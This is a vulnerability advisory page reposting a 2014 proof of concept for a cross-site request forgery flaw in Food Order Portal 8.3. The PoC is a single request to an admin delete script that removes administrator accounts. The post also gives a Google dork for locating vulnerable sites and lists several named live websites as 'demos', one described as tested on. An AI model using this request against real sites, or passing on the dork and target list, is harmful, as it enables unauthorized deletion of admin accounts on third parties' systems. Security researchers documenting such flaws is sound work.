Food Order Portal 8.3 Cross Site Request Forgery

2014.09.13
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact(onlymail) : knockout@e-mail.com.tr [~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com [~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE&#169;,VolqaN,Septemb0x | Unuttuklarmz affola.. ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Food Order Portal |~Affected Version : 8.3 |~Official Web and referance's : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html |~RISK : Medium |~Google Keyword/Dork : inurl:login_restaurant.php | are example |~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora ####################INFO################################ without logging in to the admin panel it is possible to delete administrator.. ######################################################## ######################################################## Demos ; http://click4foods.co.uk <=== Tested and panel was checked. CSRF was confirmed ( From the official site of reference are shown ) http://www.saveonmeals.com http://pizzatakeway.it/ http://myfood24.it/ http://www.foodrunner.ru/ .. .. ==============================================================================00 CSRF PoC: http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2) Administrator Deleted. ==============================================================================00 .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top